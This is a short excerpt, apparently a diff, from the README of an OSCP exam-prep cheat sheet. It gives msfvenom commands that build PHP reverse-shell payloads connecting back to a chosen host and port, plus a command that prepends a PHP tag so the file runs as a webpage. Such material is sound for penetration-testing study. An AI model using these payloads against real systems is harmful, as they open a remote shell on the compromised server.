monkeysm8/OSCP_HELP/README.md

       *PHP*

+      msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

+      OR

       msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

+      Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:

       cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php